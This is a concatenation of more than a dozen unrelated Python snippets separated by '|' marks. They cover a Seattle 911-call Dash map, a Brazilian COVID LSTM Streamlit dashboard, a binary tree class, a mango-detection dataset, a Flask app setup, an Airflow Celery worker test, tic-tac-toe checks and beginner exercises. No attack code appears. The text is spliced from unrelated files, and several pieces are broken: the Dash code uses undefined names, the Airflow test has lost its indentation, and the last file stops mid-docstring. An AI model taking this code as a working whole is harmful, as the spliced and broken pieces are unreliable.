# Shared Plotly layout used by every map figure returned by gen_map().
layout_map = dict(
    autosize=True,
    height=1000,
    font=dict(color="#191A1A"),
    titlefont=dict(color="#191A1A", size='14'),
    margin=dict(
        l=35,
        r=35,
        b=35,
        t=45
    ),
    hovermode="closest",
    plot_bgcolor='#fffcfc',
    paper_bgcolor='#fffcfc',
    legend=dict(font=dict(size=10), orientation='h'),
    title='911 Calls in Seattle',
    # Free OpenStreetMap tiles centered on Seattle; no Mapbox token required.
    mapbox=dict(
        style = "open-street-map",
        center=dict(
            lon=-122.3,
            lat=47.5
        ),
        zoom=10,
    )
)
# functions
def gen_map(map_data):
    """Build a scattermapbox figure dict for the given 911-call rows.

    Uses the module-level `layout_map` as the figure layout; one marker
    is drawn per row at its Latitude/Longitude.
    """
    marker_style = {
        "size": 6,
        "opacity": 0.7
    }
    trace = {
        "type": "scattermapbox",
        "lat": list(map_data['Latitude']),
        "lon": list(map_data['Longitude']),
        "mode": "markers",
        "name": list(map_data['Zone']),
        "marker": marker_style,
    }
    return {"data": [trace], "layout": layout_map}
@app.callback(
    Output('map-graph', 'figure'),
    [Input('year-option', 'value'),
     Input('type-option', 'value'),
     Input('zone-option', 'value'),
     Input('month-slider', 'value')])
def update_figure(year, selected_type, selected_zone, month_value):
    """Redraw the map for the selected year, call type, zone and month."""
    mask = ((df.Type == selected_type)
            & (df.Month == month_value)
            & (df.Year == year)
            & (df.Zone == selected_zone))
    return gen_map(df[mask])
@app.callback(
    Output('statistics', 'figure'),
    [Input('year-option', 'value'),
     Input('type-option', 'value'),
     Input('month-slider', 'value')])
def update_graph(year, selected_type, month_value):
    """Bar chart of call counts per zone for the current selection."""
    selection = df[(df.Type == selected_type) & (df.Month == month_value) & (df.Year == year)]
    # value_counts + reset_index yields columns 'index' (zone) and 'Zone' (count).
    counts = selection.Zone.value_counts().reset_index()
    bar_trace = dict(
        x=counts['index'],
        y=counts['Zone'],
        type = 'bar'
    )
    bar_layout = dict(
        xaxis={
            'title': 'Zone'
        },
        yaxis={
            'title': 'Counts'
        },
        hovermode='closest'
    )
    return {'data': [bar_trace], 'layout': bar_layout}
# Start the Dash development server (debug mode enables hot reload).
if __name__ == '__main__':
    app.run_server(debug=True)
|
import sys
sys.path.append("../..")
from gowalla_research.random_walk.random_walk import doRandomWalkPickle2Pickle
from gowalla_research.core.user import User
from gowalla_research.core.connection import Edge
# Run ten random walks of increasing length: 1000, 2000, ..., 10000 steps,
# each reading the same node dictionary and writing its own pickle.
for walk_index in range(1, 11):
    doRandomWalkPickle2Pickle(
        "nodes_data_dictionary.pkl",
        "full_random/NODES" + str(walk_index) + "000.pkl",
        walk_index * 1000,
    )
|
"""
Created on Mon Mar 8 15:11:51 2021
Baseado nos treinamentos realizados por:
covid_lstm_dev_n02
@author: lmmastella
"""
# %% Import libraries
import numpy as np
import pandas as pd
import streamlit as st
from PIL import Image
import plotly.graph_objs as go
from plotly.subplots import make_subplots
from sklearn.preprocessing import MinMaxScaler
from tensorflow.keras.models import load_model
from datetime import datetime, timedelta
import os
# %% Prepara os dados em time step para a LSTM(timesteps)
def create_dataset(data, ts=1):
    """Slice a (n, 1) series into sliding LSTM windows.

    Parameters
    ----------
    data : array-like, shape (n, 1)
        Input series, indexable as ``data[i, 0]``.
    ts : int
        Window length (timesteps).

    Returns
    -------
    x : np.ndarray, shape (n - ts, ts)
        Input windows.
    y : np.ndarray, shape (n - ts,)
        The value immediately following each window.
    """
    windows = [data[i - ts:i, 0] for i in range(ts, len(data))]
    targets = [data[i, 0] for i in range(ts, len(data))]
    return np.array(windows), np.array(targets)
# %% Predict
def create_predict(data, pred_datas):
    """Iteratively forecast ``pred_datas`` future points with the global LSTM.

    Relies on the module-level ``model``, ``n_steps`` and ``n_features``.
    After each one-step prediction the window slides forward: the oldest
    sample is dropped and the new prediction is appended.

    Parameters
    ----------
    data : np.ndarray, shape (n_steps, 1)
        The most recent observations, already scaled for the model.
    pred_datas : int
        Number of future points to forecast.

    Returns
    -------
    np.ndarray of the ``pred_datas`` forecast values (still scaled).
    """
    forecasts = []
    window = data
    for _ in range(pred_datas):
        batch = window.reshape(1, n_steps, n_features)
        step = model.predict(batch)
        forecasts.append(step[0, 0])
        # Slide the window: drop the oldest row, append the prediction.
        window = np.vstack([np.delete(window, 0, axis=0), step])
    return np.array(forecasts)
# %% Define o tipo de análise - Casos ou Mortes
def define_dataset(tipo):
    """Pick the dataframe and chart colours for the analysis type.

    Parameters
    ----------
    tipo : str
        'Obitos' selects the deaths dataframe; anything else selects cases.

    Returns
    -------
    (df, cor1, cor2) : the module-level dataframe plus two colour names
    used by the charts below.
    """
    if tipo == 'Obitos':
        return (df_obitos, 'blue', 'red')
    return (df_casos, 'blue', 'royalblue')
# %% Acertar a seleção com a base de dados
def get_tipo_local(local_tipo):
    """Map the UI location-type label to its dataset column and value list.

    Parameters
    ----------
    local_tipo : str
        'Região', 'Estado' or 'Município' (labels shown in the sidebar).

    Returns
    -------
    tuple (column_name, sorted unique values from that column of
    ``df_brasil_ori``) for a known label; None for anything else.
    """
    # UI label -> dataframe column name.
    label_to_column = {
        'Região': 'regiao',
        'Estado': 'estado',
        'Município': 'municipio',
    }
    column = label_to_column.get(local_tipo)
    if column is None:
        # BUG FIX: the original ended with the bare expression 'None',
        # a no-op statement; the implicit None return is now explicit.
        return None
    return column, sorted(df_brasil_ori[column].unique().tolist())
# %% Importa Dataset e prepara base de dados para análise
# arquivo original baixado de https://covid.saude.gov.br
@st.cache
def load_data():
    """Read the two COVID history CSV halves, concatenate and clean them.

    The source file (downloaded from https://covid.saude.gov.br) is split
    in two parts; missing values are replaced with empty strings so the
    string comparisons used later in the selection logic work.
    """
    base = "/Users/lmmastella/dev/covid/"
    halves = [pd.read_csv(base + name, sep=";")
              for name in ("HIST_PAINEL_COVIDBR1.csv", "HIST_PAINEL_COVIDBR2.csv")]
    combined = pd.concat(halves)
    return combined.replace(np.nan, '', regex=True)
df_brasil_ori = load_data()
# %% Streamlit cover page
st.title('COVID-19 Análise')
st.write("""
# Análise da evolução da COVID no Brasil
**1.Visualizar** gráficos do Brasil, Estados e Municípios
""")
# Banner image shown under the title.
image = Image.open("/Users/lmmastella/dev/web/Covid.jpeg")
st.image(image, use_column_width=True)
# %% Streamlit sidebar - variables that drive the dataset selection below:
# tipo - 'Casos' (cases) or 'Obitos' (deaths)
# tipo_local - dataset column: regiao, estado or municipio
# local - Brasil, RS, Porto Alegre etc.
st.sidebar.header("Escolha o tipo e local de análise")
lista_tipo = ('Casos', 'Obitos')
tipo = st.sidebar.selectbox('Selecione o tipo de análise', lista_tipo)
lista_local_tipo = ('Região', 'Estado', 'Município')
local_tipo = st.sidebar.selectbox(
    'Selecione o tipo de local', lista_local_tipo)
tipo_local, lista_local = get_tipo_local(local_tipo)
local = st.sidebar.selectbox('Selecione o local desejado', lista_local)
day = datetime.today().strftime("%Y-%m-%d")  # report date (str)
st.sidebar.text_input('Data Atual: ', day)
st.sidebar.text_input('Data do Arquivo: ', df_brasil_ori['data'].iloc[-1])
# %% Filter the dataset according to the variables above
# Row granularity: municipality rows have a non-empty 'municipio'; state
# and region aggregate rows are the ones with an empty 'codmun'.
if tipo_local == 'municipio':
    df_brasil = df_brasil_ori[df_brasil_ori[tipo_local] != '']
elif tipo_local == 'estado':
    df_brasil = df_brasil_ori[(df_brasil_ori[tipo_local] != '')
                              & (df_brasil_ori['codmun'] == '')]
# dataset quirk: empty-codmun also marks aggregate rows for regions
elif tipo_local == 'regiao':
    df_brasil = df_brasil_ori[(df_brasil_ori[tipo_local] != '')
                              & (df_brasil_ori['codmun'] == '')]
# dataset quirk (see note above)
# selected rows: df_brasil
# Drop columns not used by the charts below
df_brasil = df_brasil.drop(columns=['coduf', 'codmun',
                                    'codRegiaoSaude', 'nomeRegiaoSaude',
                                    'semanaEpi', 'populacaoTCU2019',
                                    'Recuperadosnovos', 'emAcompanhamentoNovos',
                                    'interior/metropolitana'])
# keep only the chosen location
df_brasil = df_brasil[df_brasil[tipo_local] == local]
# drop duplicated dates
df_brasil = df_brasil.drop_duplicates(['data'])
# %% DATA ERRORS: discard absurd daily case counts (bad upstream records)
mask = (df_brasil['casosNovos'] > 120000) | (df_brasil['casosNovos'] < -120000)
df_brasil = df_brasil.loc[~mask]
# %% Chart: actual cases for the selected location
fig = go.Figure()
fig = make_subplots(specs=[[{"secondary_y": True}]])
# cumulative cases (line, secondary/right axis)
fig.add_trace(
    go.Scatter(
        x=df_brasil['data'],
        y=df_brasil['casosAcumulado'],
        mode='lines+markers',
        name='Casos Total',
        line_color='blue'),
    secondary_y=True
)
# daily new cases (bars, primary/left axis)
fig.add_trace(
    go.Bar(x=df_brasil['data'],
           y=df_brasil['casosNovos'],
           name='Casos Diarios',
           marker_color='blue'),
    secondary_y=False
)
# 7-day moving average of daily cases
fig.add_trace(
    go.Scatter(x=df_brasil['data'],
               y=round(df_brasil['casosNovos'].rolling(7).mean()),
               name=' MM7',
               marker_color='black'),
    secondary_y=False
)
# Layout
fig.update_layout(title_text=local + ' - Evolução de Casos',
                  legend=dict(x=0.02, y=0.95),
                  legend_orientation="v",
                  hovermode='x unified')
# X axis
fig.update_xaxes(title_text="Datas")
# Y axes: totals on the right (secondary), daily counts on the left
fig.update_yaxes(title_text="Casos Total", secondary_y=True)
fig.update_yaxes(title_text="Casos Diarios", secondary_y=False)
st.plotly_chart(fig)
# %% Chart: actual deaths for the selected location (same structure as above)
fig = go.Figure()
fig = make_subplots(specs=[[{"secondary_y": True}]])
fig.add_trace(
    go.Scatter(
        x=df_brasil['data'],
        y=df_brasil['obitosAcumulado'],
        mode='lines+markers',
        name='Óbitos Total',
        line_color='red'),
    secondary_y=True
)
fig.add_trace(
    go.Bar(x=df_brasil['data'],
           y=df_brasil['obitosNovos'],
           name='Óbitos Diarios',
           marker_color='red'),
    secondary_y=False
)
fig.add_trace(
    go.Scatter(x=df_brasil['data'],
               y=round(df_brasil['obitosNovos'].rolling(7).mean()),
               name=' MM7',
               marker_color='black'),
    secondary_y=False
)
# Layout
fig.update_layout(title_text=local + ' - Evolução de Óbitos',
                  legend=dict(x=0.02, y=0.95),
                  legend_orientation="v",
                  hovermode='x unified')
# X axis
fig.update_xaxes(title_text="Datas")
# Y axes
fig.update_yaxes(title_text="Óbitos Total", secondary_y=True)
fig.update_yaxes(title_text="Óbitos Diarios", secondary_y=False)
st.plotly_chart(fig)
# %% Training-related variables and model loading
st.write(
    """
**2.Visualizar** gráficos de tendência do Brasil, Estados e Municípios.
Algoritmo de predição LSTM (biblioteca Tensorflow)
""")
if st.checkbox('Predições para os dias selecionados'):
    pred_days = st.slider('Selecione o número de dias para análise', 1, 30, 10)
    n_steps = 10  # LSTM window length (samples per input)
    n_features = 1  # single target feature (y)
else:
    st.stop()
# %% Stop early if no pre-trained model exists for this type/location
arq = 'Covid_lstm_' + tipo + '_' + local + '_v_02.h5'
if(not os.path.exists(arq)):
    st.write(
        " Local sem dados de treinamento, favor solicitar inclusão na base de dados")
    st.stop()
model = load_model(arq)
# %% Choose the working dataset by analysis type (Casos or Obitos)
df_casos = df_brasil[['data', 'casosNovos']].set_index('data')
df_obitos = df_brasil[['data', 'obitosNovos']].set_index('data')
df, cor1, cor2 = define_dataset(tipo)
df.columns = [tipo]
# %% Scale the data into [0, 1], as used for training
df_scaler = df.values
scaler = MinMaxScaler(feature_range=(0, 1))
df_scaler = scaler.fit_transform(df_scaler)
# %% Build the windowed arrays with create_dataset
data_x, data_y = create_dataset(df_scaler, n_steps)
# %% Reshape features for the LSTM layer: [samples, time steps, features]
data_x = np.reshape(data_x, (data_x.shape[0], data_x.shape[1], 1))
# %% In-sample predictions (same data used for training)
predictions = model.predict(data_x)
predictions = scaler.inverse_transform(predictions)
predictions = np.around(predictions).astype(int)
# %% Forecast the next days from the last n_steps observations
df_p = df[-n_steps:].values  # last n_steps values
df_p = scaler.transform(df_p)  # scale for the LSTM
# forecast pred_days points ahead with create_predict
predictions_p = create_predict(df_p, pred_days)
# back to the original scale, rounded to whole counts
predictions_p = scaler.inverse_transform(predictions_p.reshape(-1, 1))
predictions_p = np.around(predictions_p).astype(int)
# %% Date handling: dataset dates are strings like 2020-02-22 (yyyy-mm-dd)
index_days = [datetime.strptime(d, '%Y-%m-%d')
              for d in df.index[n_steps:]]
# one future date per forecast point (pred_days of them)
next_days = [index_days[-1] + timedelta(days=i) for i in range(1, pred_days+1)]
# full timeline: observed + forecast dates
total_days = index_days + next_days
# %% Assemble the comparison dataframe (real vs predicted)
CasosDiasPre = pd.Series(np.concatenate(
    (predictions, predictions_p))[:, 0])  # daily predictions over the full span
CasosDias = pd.Series(df[n_steps:].values[:, 0].astype(int))
CasosPre = pd.Series(CasosDiasPre).cumsum()
CasosReais = pd.Series(CasosDias).cumsum()
CasosMM7 = round(CasosDias.rolling(7).mean(), 2)
predict = pd.DataFrame([total_days,
                        list(CasosPre),
                        list(CasosReais),
                        list(CasosDiasPre),
                        list(CasosDias),
                        list(CasosMM7)],
                       ["Data", "CasosPre", "CasosReais",
                        "CasosDiasPre", "CasosDias",
                        "CasosMM7"]).\
    transpose().set_index("Data")
# %% Chart: real vs predicted cases/deaths for the selected location
fig = go.Figure()
fig = make_subplots(specs=[[{"secondary_y": True}]])
# cumulative predicted (line, secondary/right axis)
fig.add_trace(
    go.Scatter(
        x=predict.index,
        y=predict['CasosPre'],
        mode='lines+markers',
        name=tipo + ' Previstos',
        line_color='crimson'),
    secondary_y=True
)
# cumulative real (line, secondary/right axis)
fig.add_trace(
    go.Scatter(
        x=predict.index,
        y=predict['CasosReais'],
        mode='lines+markers',
        name=tipo + ' Reais',
        line_color=cor1),
    secondary_y=True
)
# daily predicted (bars, primary/left axis)
fig.add_trace(
    go.Bar(x=predict.index,
           y=predict['CasosDiasPre'],
           name='Diario Previsto',
           marker_color='tan'),
    secondary_y=False
)
# daily real (bars, primary/left axis)
fig.add_trace(
    go.Bar(x=predict.index,
           y=predict['CasosDias'],
           name='Diario Real',
           marker_color=cor2),
    secondary_y=False
)
# 7-day moving average of the real daily values
fig.add_trace(
    go.Scatter(x=predict.index,
               y=predict['CasosMM7'],
               name=tipo + ' MM7',
               marker_color='black'),
    secondary_y=False
)
# Layout
fig.update_layout(title_text=local + ' Previsão e Evolução de ' + tipo,
                  legend=dict(x=0.02, y=0.95),
                  legend_orientation="v",
                  hovermode='x unified')
# X axis
fig.update_xaxes(title_text="Datas")
# Y axes
fig.update_yaxes(title_text=tipo + " Total", secondary_y=True)
fig.update_yaxes(title_text=tipo + " Diarios", secondary_y=False)
st.plotly_chart(fig)
# %% Optional table comparing real and predicted values
if st.checkbox('Verificar o dataset comparativo'):
    st.dataframe(predict.style.highlight_max(axis=0).set_precision(2))
    # st.table(predict.style.set_precision(2))
else:
    st.stop()
# %% TESTE TODO |
# -*- coding: utf-8 -*-
"""
Created on Sun Nov 18 23:50:30 2018
@author: Rathin
"""
#This code implements the distortion filter
#It amplifies the signal and then clips it at a given threshold
import pandas as pd
data = pd.read_csv('rathinfinal300500.dat', sep='\s+', header=None, skiprows=2)# skip the two header lines of the .dat file
x=data[0] #column 0: sample times
y=data[1] #column 1: amplitudes
xlist=[] #times as plain floats
ylist=[] #amplitudes as plain floats
for i in range(0,int(len(x))):
    xlist.append(float(x.iloc[i])) #copy time value
    ylist.append(float(y.iloc[i])) #copy amplitude value
print(len(ylist)) #number of samples read
f= open("rathinoutputfile.dat","w") #output file in the same .dat format
f.write("; Sample Rate "+ str(44100)+"\n") #header: sample rate
f.write("; Channels 1 "+"\n") #header: channel count
counter=0 #sanity counter: should equal the sample count at the end
# Distortion: double the amplitude, then hard-clip at +/-0.316 (about -10 dB).
for i in range(0, int(len(xlist))): #apply the filter and write each sample
    ylist[i]=ylist[i]*2 #amplify the audio
    if ylist[i]>0.316: #clip the positive peaks
        ylist[i]=(0.316)
    elif ylist[i]< (-0.316): #clip the negative peaks
        ylist[i]= (-0.316)
    f.write(str(xlist[i])+"  " + str((ylist[i])) +"\n") #write the time/amplitude pair
    counter=counter+1 #count written samples
print (counter)
f.close() #close the output file
|
from math import*
# Angry-birds style check: does the projectile land within 0.1 of the pig?
v0 = float(input("velocidade inicial: "))
ang = float(input("angulo alfa: "))
d = float(input("distancia porco-passaro: "))
g = 9.8
# Range of a projectile launched at angle `ang` (degrees) with speed v0.
R = (v0 ** 2) * sin(2 * radians(ang)) / g
print("sim" if abs(d - R) < 0.1 else "nao")
|
import queue
class BTree:
    """Binary tree with level-order (BFS) based insert, search and delete.

    BUG FIX: the original code called ``.enqueue()``, ``.dequeue()`` and
    ``.isEmpty()`` and unwrapped items via ``.value`` — the API of a custom
    linked-list queue, not of the imported stdlib ``queue`` module — so
    every BFS method raised AttributeError at runtime.  All traversals now
    use the real ``queue.Queue`` API (``put``/``get``/``empty``) and work
    on the nodes directly.
    """

    def __init__(self, data):
        # Payload plus the two child links of this node.
        self.data = data
        self.left_child = None
        self.right_child = None

    def pre_order(self, root_node):
        """Print node, then left subtree, then right subtree."""
        if not root_node:
            return 'BT is not exist'
        print(root_node.data)
        self.pre_order(root_node.left_child)
        self.pre_order(root_node.right_child)

    def in_order(self, root_node):
        """Print left subtree, then node, then right subtree.

        BUG FIX: the original recursed via pre_order, so the subtrees
        were printed in pre-order instead of in-order.
        """
        if not root_node:
            return 'BT is not exist'
        self.in_order(root_node.left_child)
        print(root_node.data)
        self.in_order(root_node.right_child)

    def post_order(self, root_node):
        """Print left subtree, then right subtree, then node.

        BUG FIX: the original recursed via pre_order here as well.
        """
        if not root_node:
            return 'BT is not exist'
        self.post_order(root_node.left_child)
        self.post_order(root_node.right_child)
        print(root_node.data)

    def level_order(self, root_node):
        """Print the nodes breadth-first, top to bottom, left to right."""
        if not root_node:
            return 'BT is not exist'
        pending = queue.Queue()
        pending.put(root_node)
        while not pending.empty():
            node = pending.get()
            print(node.data)
            if node.left_child is not None:
                pending.put(node.left_child)
            if node.right_child is not None:
                pending.put(node.right_child)

    def search(self, root_node, node_value):
        """Return node_value if some node holds it (BFS), else 'Not Found'."""
        if not root_node:
            return 'BT is not exist'
        pending = queue.Queue()
        pending.put(root_node)
        while not pending.empty():
            node = pending.get()
            if node.data == node_value:
                return node_value
            if node.left_child is not None:
                pending.put(node.left_child)
            if node.right_child is not None:
                pending.put(node.right_child)
        return 'Not Found'

    def insert(self, root_node, new_node_value):
        """Insert a new node at the first free child slot in level order."""
        new_node = BTree(new_node_value)
        if not root_node:
            # Mirrors the original: rebinding the local has no effect for
            # the caller, and no status string is returned in this case.
            root_node = new_node
        else:
            pending = queue.Queue()
            pending.put(root_node)
            while not pending.empty():
                node = pending.get()
                if node.left_child is not None:
                    pending.put(node.left_child)
                else:
                    node.left_child = new_node
                    return 'Inserted'
                if node.right_child is not None:
                    pending.put(node.right_child)
                else:
                    node.right_child = new_node
                    return 'Inserted'

    def get_deepest_node(self, root_node):
        """Return the last node reached in level order (deepest, rightmost)."""
        if not root_node:
            return 'BT is not exist'
        pending = queue.Queue()
        pending.put(root_node)
        node = root_node
        while not pending.empty():
            node = pending.get()
            if node.left_child is not None:
                pending.put(node.left_child)
            if node.right_child is not None:
                pending.put(node.right_child)
        return node

    def delete_deepest(self, root_node, dNode):
        """Unlink ``dNode`` (assumed to be the deepest node) from the tree."""
        if not root_node:
            return 'BT is not exist'
        pending = queue.Queue()
        pending.put(root_node)
        while not pending.empty():
            node = pending.get()
            if node is dNode:
                # dNode is the root itself: nothing to unlink from, just
                # clear its payload (mirrors the original behaviour).
                node.data = None
                return
            if node.right_child:
                if node.right_child is dNode:
                    node.right_child = None
                    return
                else:
                    pending.put(node.right_child)
            if node.left_child:
                if node.left_child is dNode:
                    node.left_child = None
                    return
                else:
                    pending.put(node.left_child)

    def delete_node(self, root_node, node):
        """Delete the first node whose data equals ``node`` (a value).

        Standard binary-tree deletion: copy the deepest node's data into
        the target, then remove the deepest node.  Returns 'Deleted' on
        success, None when the value is absent.
        """
        if not root_node:
            return 'BT is not exist'
        pending = queue.Queue()
        pending.put(root_node)
        while not pending.empty():
            current = pending.get()
            if current.data == node:
                dNode = self.get_deepest_node(root_node)
                current.data = dNode.data
                self.delete_deepest(root_node, dNode)
                return 'Deleted'
            if current.left_child is not None:
                pending.put(current.left_child)
            if current.right_child is not None:
                pending.put(current.right_child)

    def delete_bt(self, root_node):
        """Clear the root in place, discarding the whole tree."""
        root_node.data = None
        root_node.left_child = None
        root_node.right_child = None
        return 'Deleted'
# Demo: a tiny catalogue tree that is built, extended, wiped and traversed.
btree = BTree('Books')
left_child, right_child = BTree('Classics'), BTree('Fantasy')
btree.left_child, btree.right_child = left_child, right_child
btree.insert(btree, 'Ninth House')
print(btree.delete_bt(btree))
btree.level_order(btree)
|
import os
import torch
import numpy as np
import torchvision
from torch.utils.data import Dataset
from PIL import Image
class MangoDetectionData(Dataset):
    """Torch Dataset yielding (image, target) pairs for mango defect detection.

    Parameters
    ----------
    img_list : list of image file paths.
    defect_pos_list : per-image list of [x0, y0, x1, y1] defect boxes.
    defect_y_list : per-image list of integer defect class labels.
    device : torch device the caller intends to use.
    transforms : optional callable applied as ``transforms(img, target)``.
    """

    def __init__(self, img_list, defect_pos_list, defect_y_list, device, transforms=None):
        self.img_list = img_list
        self.defect_pos_list = defect_pos_list
        self.defect_y_list = defect_y_list
        # BUG FIX: `device` was accepted but silently discarded; store it
        # so callers can read it back (backward-compatible addition).
        self.device = device
        self.transforms = transforms

    def __getitem__(self, idx):
        """Load image `idx` and build its detection target dict."""
        img_path = self.img_list[idx]
        img = Image.open(img_path).convert('RGB')
        boxes = torch.as_tensor(self.defect_pos_list[idx], dtype=torch.float32)
        label = torch.tensor(self.defect_y_list[idx], dtype=torch.int64)
        img_id = torch.tensor([idx])
        # Box areas: (y1 - y0) * (x1 - x0) for each [x0, y0, x1, y1] row.
        area = (boxes[:, 3] - boxes[:, 1]) * (boxes[:, 2] - boxes[:, 0])
        iscrowd = torch.zeros((len(self.defect_y_list[idx])), dtype=torch.int64)
        target = {
            "boxes": boxes,
            "label": label,    # kept for backward compatibility
            "image_id": img_id,
            "area": area,
            "iscrowd": iscrowd,
            "labels": label,   # key expected by torchvision detection models
        }
        if self.transforms is not None:
            img, target = self.transforms(img, target)
        return img, target

    def __len__(self):
        return len(self.img_list)
class MangoDetectionDataTest(Dataset):
    """Inference-time dataset: crops each image to its box and yields tensors.

    img_root : directory containing the images.
    img_list : image file names relative to ``img_root``.
    box_pos : per-image (left, upper, right, lower) crop box.
    """

    def __init__(self, img_root, img_list, box_pos):
        self.img_root = img_root
        self.img_list = img_list
        self.box_pos = box_pos

    def __getitem__(self, idx):
        """Open image `idx`, crop it to its box and return (tensor, None)."""
        full_path = os.path.join(self.img_root, self.img_list[idx])
        cropped = Image.open(full_path).convert('RGB').crop((self.box_pos[idx]))
        to_tensor = torchvision.transforms.ToTensor()
        return to_tensor(cropped), None

    def __len__(self):
        return len(self.img_list)
|
import numpy as np
import pandas as pd
# Spreadsheet skeleton: product-attribute columns, one employee row,
# every cell initialised to the empty string.
col = 'Preço produto marca desconto'.split()
lin = 'funcionário'.split()
produto =''
venda = pd.DataFrame(data=produto, index=lin, columns=col)
# Export the empty sheet and echo it to the console.
venda.to_excel( 'venda.xlsx', sheet_name='Hoje' )
print( venda )
|
#Praktikum 2
#exercise 3: print the greeting ten times
for _ in range(10):
    print('hello world')
#exercise 5: ten more greetings (originally counted 2..20 in steps of two)
for _ in range(10):
    print('Hello world')
#exercise 6: "endless" loop that stops after the tenth print
for _ in range(10):
    print('Hello world')
#exercise 8
#magic star box: a 5x5 block of asterisks
for _ in range(5):
    print('*' * 5)
#exercise 10: a growing star triangle
for height in range(1, 6):
    print('*' * height)
#exercise 11: draw random numbers until a 5 appears
from random import randint
bil = randint(0, 10)
print(bil)
while bil != 5:
    bil = randint(0, 10)
    print(bil)
#exercise 13: same, but also count how many draws were needed
draws = 0
bil = randint(0, 10)
draws += 1
print(bil)
while bil != 5:
    bil = randint(0, 10)
    draws += 1
    print(bil)
print ("jumlah perulangan =", draws)
|
# https://leetcode.com/problems/sort-array-by-parity/
#
# In-place solution.
# Complexity: runtime O(n), space O(1).
class Solution:
    def sortArrayByParity(self, A: list[int]) -> list[int]:
        """Reorder A in place so every even element precedes every odd one.

        Two-pointer partition: `i` scans from the front, `j` from the back;
        an odd element found at `i` is swapped to position `j`.

        BUG FIX: the annotations referenced ``typing.List`` without
        importing it, raising NameError when the method was defined; the
        builtin generic ``list[int]`` (Python 3.9+) needs no import.

        :param A: list of integers, reordered in place.
        :return: the same list object, evens first (relative order changes).
        """
        i, j = 0, len(A) - 1
        while i < j:
            if A[i] % 2 == 0:
                i += 1
            else:
                A[j], A[i] = A[i], A[j]
                j -= 1
        return A
|
from flask import Flask,redirect, url_for
from flask_sqlalchemy import SQLAlchemy
from flask_login import LoginManager,current_user, logout_user
from functools import wraps
# Application state created at import time so the blueprints imported
# below can reference `app`, `db` and `login_manager`.
app = Flask(__name__)
app.config.from_object('configuration.DevelopmentConfig')
db = SQLAlchemy(app)
login_manager = LoginManager()
login_manager.init_app(app)
# Unauthenticated users are redirected to the fauth blueprint's login view.
login_manager.login_view = "fauth.login"
def rol_admin_need(f):
    """View decorator that only lets users whose rol is "admin" through.

    Any other user is logged out and redirected to the login page.
    """
    @wraps(f)
    def wrapper(*args, **kwds):
        if current_user.rol.value == "admin":
            return f(*args, **kwds)
        logout_user()
        return redirect(url_for("fauth.login"))
    return wrapper
# Blueprints are imported only after `app` and `db` exist, to avoid circular
# imports between this module and the view modules.
from my_app.product.viewsProduct import product
from my_app.product.viewsCategory import category
from my_app.auth.views import auth
from my_app.fauth.views import fauth
# REST API blueprints
from my_app.rest_api import product_api
from my_app.rest_api import category_api
# Register the imported views/blueprints on the application.
app.register_blueprint(product)
app.register_blueprint(category)
#app.register_blueprint(auth)
app.register_blueprint(fauth)
# Create any missing tables at startup (no-op for tables that already exist).
db.create_all()
@app.template_filter('mydouble')
def mydouble_filter(n: int):
    """Jinja template filter `mydouble`: return twice the given number."""
    return n + n
#postgres
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from __future__ import annotations
from importlib import reload
from unittest import mock
import pytest
from airflow.cli import cli_parser
from airflow.cli.commands import celery_command
from tests.test_utils.config import conf_vars
@pytest.mark.integration("celery")
@pytest.mark.backend("mysql", "postgres")
class TestWorkerServeLogs:
@classmethod
def setup_class(cls):
with conf_vars({("core", "executor"): "CeleryExecutor"}):
# The cli_parser module is loaded during test collection. Reload it here with the
# executor overridden so that we get the expected commands loaded.
reload(cli_parser)
cls.parser = cli_parser.get_parser()
@conf_vars({("core", "executor"): "CeleryExecutor"})
def test_serve_logs_on_worker_start(self):
with mock.patch("airflow.cli.commands.celery_command.Process") as mock_process, mock.patch(
"airflow.providers.celery.executors.celery_executor.app"
):
args = self.parser.parse_args(["celery", "worker", "--concurrency", "1"])
with mock.patch("celery.platforms.check_privileges") as mock_privil:
mock_privil.return_value = 0
celery_command.worker(args)
mock_process.assert_called()
@conf_vars({("core", "executor"): "CeleryExecutor"})
def test_skip_serve_logs_on_worker_start(self):
with mock.patch("airflow.cli.commands.celery_command.Process") as mock_popen, mock.patch(
"airflow.providers.celery.executors.celery_executor.app"
):
args = self.parser.parse_args(["celery", "worker", "--concurrency", "1", "--skip-serve-logs"])
with mock.patch("celery.platforms.check_privileges") as mock_privil:
mock_privil.return_value = 0
celery_command.worker(args)
mock_popen.assert_not_called()
|
def check_x(game_board, grid_size, symbol):
    """Return True if some row holds exactly grid_size cells equal to symbol.

    Returns False (instead of the original implicit None) when no row wins.
    """
    return any(
        sum(1 for element in row if element == symbol) == grid_size
        for row in game_board
    )
def check_y(game_board, grid_size, symbol):
    """Return True if some column holds grid_size cells equal to symbol.

    Replaces the original manual two-index while loop with a direct
    column scan; returns False (not None) when no column wins.
    """
    return any(
        sum(1 for y in range(grid_size) if game_board[y][x] == symbol) == grid_size
        for x in range(grid_size)
    )
def check_diagonal_1(game_board, grid_size, symbol):
    """Return True if the main diagonal (top-left to bottom-right) is all symbol.

    The grid_size > 0 guard keeps an empty board from counting as a win
    (all() over an empty generator would be True); no-win returns False.
    """
    return grid_size > 0 and all(
        game_board[i][i] == symbol for i in range(grid_size)
    )
def check_diagonal_2(game_board, grid_size, symbol):
    """Return True if the anti-diagonal (bottom-left to top-right) is all symbol.

    Cell k of the anti-diagonal is game_board[grid_size - 1 - k][k].
    The grid_size > 0 guard prevents an empty board from winning;
    no-win returns False instead of the original implicit None.
    """
    return grid_size > 0 and all(
        game_board[grid_size - 1 - k][k] == symbol for k in range(grid_size)
    )
def check_for_winner(game_board, grid_size, symbol):
    """Check rows, columns and both diagonals for a win by `symbol`.

    Returns a proper bool: True on any winning line, False otherwise
    (the original fell off the end and returned None).
    """
    return bool(
        check_x(game_board, grid_size, symbol)
        or check_y(game_board, grid_size, symbol)
        or check_diagonal_1(game_board, grid_size, symbol)
        or check_diagonal_2(game_board, grid_size, symbol)
    )
|
from interface import *
# ================================ 2.1.1 ReLU ================================
class ReLU(Layer):
    """Element-wise rectified linear unit: f(x) = max(x, 0)."""

    def forward(self, inputs):
        """
        :param inputs: np.array((n, ...)), input values,
